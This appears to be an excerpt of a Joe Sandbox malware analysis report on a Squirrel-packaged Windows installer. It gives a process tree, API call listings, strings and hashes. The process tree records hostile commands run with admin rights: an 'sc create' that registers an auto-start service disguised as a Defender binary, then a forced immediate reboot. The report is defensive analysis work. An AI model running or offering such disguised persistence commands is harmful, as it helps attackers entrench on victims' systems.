Start date:	16/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	14:30:08
Start date:	16/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\\Program Files (x86)\\Microsoft.NET\\MpCmdRun.exe" start= auto
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:30:09
Start date:	16/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:30:09
Start date:	16/02/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc create WdCmdSvc binPath= "C:\\Program Files (x86)\\Microsoft.NET\\MpCmdRun.exe" start= auto
Imagebase:	0xb20000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:30:12
Start date:	16/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C shutdown.exe -r -t 1 -f
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:30:12
Start date:	16/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:30:12
Start date:	16/02/2024
Path:	C:\Windows\SysWOW64\shutdown.exe
Wow64 process (32bit):	true
Commandline:	shutdown.exe -r -t 1 -f
Imagebase:	0x850000
File size:	23'552 bytes
MD5 hash:	FCDE5AF99B82AE6137FB90C7571D40C3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.1%
Total number of Nodes:	845
Total number of Limit Nodes:	19

Executed Functions

Function 00F9653A Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 341
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 00F96544

Part of subcall function 00F964BD: __EH_prolog3_GS.LIBCMT ref: 00F964C4
Part of subcall function 00F964BD: IUnknown_QueryInterface_Proxy.RPCRT4(?,00FB6EE8), ref: 00F9650D

IUnknown_QueryInterface_Proxy.RPCRT4(00000000,00FB6ED8,?), ref: 00F96617
SysFreeString.OLEAUT32(?), ref: 00F9667D
VariantClear.OLEAUT32(?), ref: 00F966A1
VariantClear.OLEAUT32(?), ref: 00F966AA
VariantClear.OLEAUT32(?), ref: 00F966B3
VariantClear.OLEAUT32(?), ref: 00F966B9
SysAllocString.OLEAUT32(?), ref: 00F966E6
GetFileAttributesW.KERNEL32(00000000), ref: 00F967C7
GetTempFileNameW.KERNEL32(00000000,Squirrel,00000000,?), ref: 00F967EB
DeleteFileW.KERNEL32(?), ref: 00F96800
PathIsUNCW.SHLWAPI(00000000), ref: 00F96807

Part of subcall function 00F97198: VariantClear.OLEAUT32 ref: 00F971A4
Part of subcall function 00F97198: SysAllocString.OLEAUT32(?), ref: 00F971B7
Part of subcall function 00F97198: VariantClear.OLEAUT32 ref: 00F971E8

CreateDirectoryW.KERNEL32(?,00000000), ref: 00F96852
GetLastError.KERNEL32 ref: 00F96860
FreeResource.KERNEL32(00000000,Failed to extract installer), ref: 00F96DF2

Strings

Unable to write to %s - IT policies may be restricting access to this folder, xrefs: 00F96878
SQUIRREL_TEMP, xrefs: 00F967A8
Squirrel, xrefs: 00F967E5
\SquirrelTemp, xrefs: 00F96831

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: ClearVariant$FileString$AllocFreeH_prolog3_Interface_ProxyQueryUnknown_$AttributesCreateDeleteDirectoryErrorLastNamePathResourceTemp
String ID: SQUIRREL_TEMP$Squirrel$Unable to write to %s - IT policies may be restricting access to this folder$\SquirrelTemp
API String ID: 2091110241-3256680801
Opcode ID: d81c217a1e376aa303c5a3d4b6df9a81ffb3fa8eeba4036a078a8f74eaba1fa0
Instruction ID: a5574ee0ba22b4d636f66ca6394e81e03cb51a0362bbce7a1e0cb34474619da4
Opcode Fuzzy Hash: d81c217a1e376aa303c5a3d4b6df9a81ffb3fa8eeba4036a078a8f74eaba1fa0
Instruction Fuzzy Hash: 4BC1B1B1D006189BEF11DFA4CC44BDEBBB9AF49710F004599E908EB241DB799F48DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F97326 Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 168
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetDefaultDllDirectories.KERNEL32(00000800), ref: 00F9734F
LoadLibraryW.KERNEL32(kernel32.dll), ref: 00F9735A
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00F97366
CoInitialize.OLE32(00000000), ref: 00F973CD
InitCommonControlsEx.COMCTL32(?), ref: 00F973EE

Part of subcall function 00F92304: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003), ref: 00F92373
Part of subcall function 00F92304: VerSetConditionMask.KERNEL32(00000000), ref: 00F92377
Part of subcall function 00F92304: VerSetConditionMask.KERNEL32(00000000), ref: 00F9237B
Part of subcall function 00F92304: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00F9239E

GetModuleHandleW.KERNEL32(00000000,?,--rerunningWithoutUAC,?,00FB6FB0), ref: 00F97506
GetModuleFileNameW.KERNEL32(00000000,?,00001000), ref: 00F97519

Strings

--checkInstall, xrefs: 00F9738C
--rerunningWithoutUAC, xrefs: 00F97536
This program cannot run on Windows XP or before; it requires a later version of Windows., xrefs: 00F974A2
Please re-run this installer as a normal user instead of "Run as Administrator"., xrefs: 00F97463
Failed to install the .NET Framework, try installing the latest version manually, xrefs: 00F974D3
SetDefaultDllDirectories, xrefs: 00F97360
kernel32.dll, xrefs: 00F97355
Incompatible Operating System, xrefs: 00F9749D
--silent, xrefs: 00F973BF
--rerunningWithoutUAC, xrefs: 00F97445

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: ConditionMask$Module$AddressCommonControlsDefaultDirectoriesFileHandleInfoInitInitializeLibraryLoadNameProcVerifyVersion
String ID: --rerunningWithoutUAC$ --silent$--checkInstall$--rerunningWithoutUAC$Failed to install the .NET Framework, try installing the latest version manually$Incompatible Operating System$Please re-run this installer as a normal user instead of "Run as Administrator".$SetDefaultDllDirectories$This program cannot run on Windows XP or before; it requires a later version of Windows.$kernel32.dll
API String ID: 365319271-1442077338
Opcode ID: 1195a1061b6260f484bbe4567e5a2919937cac48ddb636431fc60b80eb57ef31
Instruction ID: 6c0b3b947bf309575fafa9c13163d590178c42c86f8bea6ee5ebe76411a33e5c
Opcode Fuzzy Hash: 1195a1061b6260f484bbe4567e5a2919937cac48ddb636431fc60b80eb57ef31
Instruction Fuzzy Hash: D4510871A043149AFF24FB759C8AAAEB764AF40310F0440A4F909A3183DF789E49FF55

Uniqueness

Uniqueness Score: -1.00%

Function 00FA1584 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,00FA1583,?,E9800040,?,?), ref: 00FA15A6
TerminateProcess.KERNEL32(00000000,?,00FA1583,?,E9800040,?,?), ref: 00FA15AD
ExitProcess.KERNEL32 ref: 00FA15BF

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 7f8b78a121bbba34918bd9cd5cf3579f4cd795b696d79a54f08a553819ceaf7f
Instruction ID: 3f5feda792fab29573948e4d718c802eb16bd7de0ec6a61446c85146da7ce072
Opcode Fuzzy Hash: 7f8b78a121bbba34918bd9cd5cf3579f4cd795b696d79a54f08a553819ceaf7f
Instruction Fuzzy Hash: 2AE0ECB1804508AFCF216F94DE09A493FA9FF86751F054424FD069A232DB39DE85EB84

Uniqueness

Uniqueness Score: -1.00%

Function 00F971EF Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 00F971F9
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00F9720A
LoadLibraryW.KERNELBASE(?), ref: 00F972CF
LoadLibraryW.KERNELBASE(?), ref: 00F972E6
LoadLibraryW.KERNELBASE(?), ref: 00F972FD

Strings

\sspicli.dll, xrefs: 00F97292
\logoncli.dll, xrefs: 00F9725A
\version.dll, xrefs: 00F9722C

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: LibraryLoad$DirectoryH_prolog3_System
String ID: \logoncli.dll$\sspicli.dll$\version.dll
API String ID: 204495113-3953914256
Opcode ID: 2f91ae3879062b636805e2e8f1de737d9480388454cf9d9a3ba0b5a5fd0d5d86
Instruction ID: 8fccc43fb212b438a6d5b68a3d97e09886b3d20cf17e1e592ee63029d29f0c80
Opcode Fuzzy Hash: 2f91ae3879062b636805e2e8f1de737d9480388454cf9d9a3ba0b5a5fd0d5d86
Instruction Fuzzy Hash: EE312F7195422C9ADF65FB64CC9DADDB3B8AF24304F5001E9A009A3091EF389B89DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00F9635A Relevance: 7.6, APIs: 5, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 00F96361
VariantInit.OLEAUT32(?), ref: 00F9639E
IUnknown_QueryInterface_Proxy.RPCRT4(?,00FB6EC8,?), ref: 00F963F1
VariantClear.OLEAUT32(?), ref: 00F9649C
VariantClear.OLEAUT32(?), ref: 00F964A2

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: Variant$Clear$H_prolog3_InitInterface_ProxyQueryUnknown_
String ID:
API String ID: 1900967701-0
Opcode ID: a6cee29602947a99f441befb34376e48d2a8fa2977338ace693dc43670b63d5c
Instruction ID: 5adcbf6008806794f6f01a2d6251b07138129d411a0dfdf6cde082ca3d17a1dc
Opcode Fuzzy Hash: a6cee29602947a99f441befb34376e48d2a8fa2977338ace693dc43670b63d5c
Instruction Fuzzy Hash: 5F5150B5E00209EFDF00CFE8C884AAEBBB9AF89710F144058E505EB290DB75DE05DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F962D8 Relevance: 7.5, APIs: 5, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00F962E9
OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00F962FA
GetLastError.KERNEL32 ref: 00F96304
GetTokenInformation.KERNELBASE(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00F96329
CloseHandle.KERNEL32(00000000), ref: 00F96345

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: ProcessToken$CloseCurrentErrorHandleInformationLastOpen
String ID:
API String ID: 2078281146-0
Opcode ID: 6304b91e4ae4decb7956d4dcfcc030d238b8bc36a0b0a72e64241c1b48b011d7
Instruction ID: 921fee6314a88e1b6c2e19d62aac04636d1b9fe01e4e40414b86442114ff07fb
Opcode Fuzzy Hash: 6304b91e4ae4decb7956d4dcfcc030d238b8bc36a0b0a72e64241c1b48b011d7
Instruction Fuzzy Hash: 66017C75A0020DEFEB10EFB4CD89BBEBBF8FB04305F404569A602D6191DB749948EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F9115F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,Release,00000000,?,?,?,80000002,SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full,00020019), ref: 00F911B8

Strings

Release, xrefs: 00F911B0
SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full, xrefs: 00F9117A

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: QueryValue
String ID: Release$SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full
API String ID: 3660427363-1765340461
Opcode ID: 62909b7f84f6df190e0a1017a38a89212b6980294e9e8c11966792e5a06a2be2
Instruction ID: f80f31733edeb2adbeeeb341463e7d61b28db730e5e10b3340f37156b6b8686b
Opcode Fuzzy Hash: 62909b7f84f6df190e0a1017a38a89212b6980294e9e8c11966792e5a06a2be2
Instruction Fuzzy Hash: 2D113074E0020EAFEF00DF96DC81AEEB7B8FB04354F40457EE911A2241EA749A49EB55

Uniqueness

Uniqueness Score: -1.00%

Function 00FA5BA3 Relevance: 3.1, APIs: 2, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FA5948: GetOEMCP.KERNEL32(00000000,00FA5BBE,?,00F9EC92,?,?,00F9EC92,E9800040), ref: 00FA5973

_free.LIBCMT ref: 00FA5C1B
_free.LIBCMT ref: 00FA5C51

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: c8f619a4a113b98d67696aeda741e5ce3b95e7f80569e027da6f1bb63b004b9e
Instruction ID: 1bc4e0abf59c338f39be23742c59e50f3c14abf23f5b99db5b0a8018dd321278
Opcode Fuzzy Hash: c8f619a4a113b98d67696aeda741e5ce3b95e7f80569e027da6f1bb63b004b9e
Instruction Fuzzy Hash: D531ADB2904649AFCB01DF68CC80A9E7BB5FF46730F110199F9149B2A1EB369D50EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F964BD Relevance: 3.0, APIs: 2, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 00F964C4

Part of subcall function 00F9635A: __EH_prolog3_GS.LIBCMT ref: 00F96361
Part of subcall function 00F9635A: VariantInit.OLEAUT32(?), ref: 00F9639E
Part of subcall function 00F9635A: IUnknown_QueryInterface_Proxy.RPCRT4(?,00FB6EC8,?), ref: 00F963F1

IUnknown_QueryInterface_Proxy.RPCRT4(?,00FB6EE8), ref: 00F9650D

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: H_prolog3_Interface_ProxyQueryUnknown_$InitVariant
String ID:
API String ID: 2261498493-0
Opcode ID: 8a4a52f479966b14c86f2dcfae0c43e0d5ff4e89a6cecd42329732454481b2d0
Instruction ID: 0bed9eb3f741f2f96190300f591679ea3fbb3a05465afc3ed3e9cc7f73164e3a
Opcode Fuzzy Hash: 8a4a52f479966b14c86f2dcfae0c43e0d5ff4e89a6cecd42329732454481b2d0
Instruction Fuzzy Hash: C4118475E01205DFDB10DFA8C895DAFBB74AF45710B5542A8E905EB341CB34DE01DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F91DFF Relevance: 1.6, APIs: 1, Instructions: 51
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(00000000,00020019,00000000,?,00000000,?,?,?,?,?,00F91195,80000002,SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full,00020019), ref: 00F91E41

Part of subcall function 00F91D9C: GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,00F91E33,00000000,00020019,?,?,00000000,?,?,?,?,?,00F91195), ref: 00F91DAE
Part of subcall function 00F91D9C: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00F91DBE

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AddressHandleModuleOpenProc
String ID:
API String ID: 1337834000-0
Opcode ID: ee0d19e6d71c9b5af5b855358ca09f0df8588f9d15e22b73d8030ac0a3890a8f
Instruction ID: 8c7a792bb6d942d4eac0d35864592c2fee3a08feda6b2521c0d08a6a1b6d0afe
Opcode Fuzzy Hash: ee0d19e6d71c9b5af5b855358ca09f0df8588f9d15e22b73d8030ac0a3890a8f
Instruction Fuzzy Hash: 14014C71A0121AABEF08DF59CC55EAFBBA8FF88364F00812DB805D3240DA74BD00DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FA3674 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00F9A662,?,?,00F9218D,00000000,0000000C,00F922E6,00000000,?,?,00000000), ref: 00FA36A6

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 54fd52d22fe8273191167bcd36cecee342206110efe27c53ac981a36a3c95dc0
Instruction ID: 91bf915c8a4a5e0afd64187e6f852aa1785b730a7d933f7c8f8feafa506ab8e2
Opcode Fuzzy Hash: 54fd52d22fe8273191167bcd36cecee342206110efe27c53ac981a36a3c95dc0
Instruction Fuzzy Hash: A8E065B564122477EA312A65EC14F5A3A889B433B1F150221FC5596390CB64DD44B9A5

Uniqueness

Uniqueness Score: -1.00%

Function 00F99CE5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F99C96

Part of subcall function 00F9A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00F9A09B
Part of subcall function 00F9A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9A103
Part of subcall function 00F9A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9A114

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 7625efa1f1157d691260b452632158f9d9a465b23dfe4a29576a5a34d1c8c11f
Instruction ID: 45f4cb21bd7653f0c762cfd58e32a0d3a46d5a8eb23bea65ecddf07fc4303167
Opcode Fuzzy Hash: 7625efa1f1157d691260b452632158f9d9a465b23dfe4a29576a5a34d1c8c11f
Instruction Fuzzy Hash: 7DB012C225C1016D3918B11B1C03E76275CC1C0B10330882FF400C5042D9808C113433

Uniqueness

Uniqueness Score: -1.00%

Function 00F99CDB Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F99C96

Part of subcall function 00F9A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00F9A09B
Part of subcall function 00F9A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9A103
Part of subcall function 00F9A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9A114

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 9c824d548b7c37bf815ad4922a7c6be8e5154958258584f2b02129d2a4a9e525
Instruction ID: 80238aa639c7741efbb7a13d4b81193bb7da683fe06a3239214f2f4c755cef66
Opcode Fuzzy Hash: 9c824d548b7c37bf815ad4922a7c6be8e5154958258584f2b02129d2a4a9e525
Instruction Fuzzy Hash: 1CB012C235C1017D3959B11B1C03E76264CD1C0B10330482EF000C5081D8808C413433

Uniqueness

Uniqueness Score: -1.00%

Function 00F99CD1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F99C96

Part of subcall function 00F9A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00F9A09B
Part of subcall function 00F9A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9A103
Part of subcall function 00F9A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9A114

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
